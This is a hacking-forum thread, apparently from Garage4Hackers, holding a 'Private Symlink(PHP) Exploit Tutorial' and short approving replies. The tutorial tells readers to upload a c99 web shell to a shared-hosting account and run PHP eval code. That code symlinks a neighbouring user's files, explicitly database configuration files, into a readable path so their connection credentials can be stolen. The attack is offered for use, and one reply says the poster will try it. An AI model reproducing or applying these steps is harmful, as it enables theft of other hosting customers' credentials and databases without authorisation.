Results 1 to 9 of 9

Thread: Private Symlink(PHP) Exploit Tutorial by Silic0N Share/Save - My123World.Com!

  1. #1

    Cool Private Symlink(PHP) Exploit Tutorial

    ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++
    ~*^...Symlink(PHP) Exploit Tutorial...^*~
    ++++++++++++++++++++++++++++++++++++++++++++++++++ +++++

    ~*^...LEECHERS, DON'T MAKE ANY CHANGES IN THE Tutorial...^*~

    First of all we use Symlink function to make a shortcut for any file or folder we want

    that's why this function will be very useful for us to read any folder or file we want(For More Info Use Google).

    Here We are using the Shell Named "c99" to execute the small code of php(Eval Code) on the shared hosting server.

    The Exploit is used to download the victim's database If and only if the victim is in a shared host


    Download the below Shell & Follow the steps.

    ================================================== ==============
    Get Any C99 Shell
    ================================================== ==============

    /Step 1 $ Upload the php i.e Shell.php

    Shell on your root path. That is /home/hackerz/public_html .

    /Step 2 $ Open the uploaded file . The path will look like

    ================================================== ==============================​==
    http://www.yoursitename.com/shell.php
    ================================================== ==============================​==


    /Step 3 $ Next Step is read carefully the below php Eval Code . it's about 10 lines of php code.


    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!

    $filepath='/home/xx/public_html/xx.xx';
    $sitepath='/home/xx/public_html/';
    $writeblefilepath='myfile.txt';$flib=$sitepath.$wr iteblefilepath;
    @unlink($flib);
    symlink($filepath, $flib);
    echo readlink($flib) . "\n";
    echo "<textarea cols=30 rows=10>".file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/" . $writeblefilepath)."</tex" . "tarea>";
    @unlink($flib);

    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!​!!!!

    /Step 4 $ You should replace (xx) in the code in the upper two lines.

    In the 1st xx in the line one, means the target username.

    In the 2nd xx.xx in the line one, means the target file full path in other word it's

    usually used to read database configuration files to to steel it's connection information.

    xx in the line two, means your username. "For Eg :- /home/Your_Ass/public_html/configuration.php"

    $writeblefilepath, to enter any writable path on your site & also it is used fo to do the link process,

    and write the output.For @unlink you can search for them on php.net .

    -- -- --- -- - -- -
    Loading . .. ..
    - - -- - -- - -- - -- - - -

    __- -- - -- - - -- - --- - -- - -- - -- -

    THE END.....
    Last edited by [s]; 02-09-2012 at 05:36 PM.

  2. #2
    Nice share bro..! u remembered dabangg..!! :P
    The three great essentials to achieve anything worth while are: Hard work, Stick-to-itiveness, and Common sense. - Thomas A. Edison
    __________________________________________________ _____________________

  3. #3
    Yes Bro Remembered Man !

  4. #4
    Garage Member D4rk357's Avatar
    Join Date
    Jul 2010
    Location
    localhost@mumbai
    Posts
    153
    Blog Entries
    1
    nice share man : ) ...
    Spirit was turned 2 ashes ,soul endured so much pain..
    now the darker time evanescence ,the fallen shall rise again.

  5. #5

  6. #6

  7. #7
    its very old bro , i don't have video ... if i m getting any good website then , i m dam sure iwill make a vid for you
    Garage4Hackers bugs for the community , of the community

    We provide IT
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    :
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.


    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
    |
    To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

  8. #8
    kewl one dude..
    I m gonna try it..I was in need of symlinking...

  9. #9
    Awesome Bro ...really Nice

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •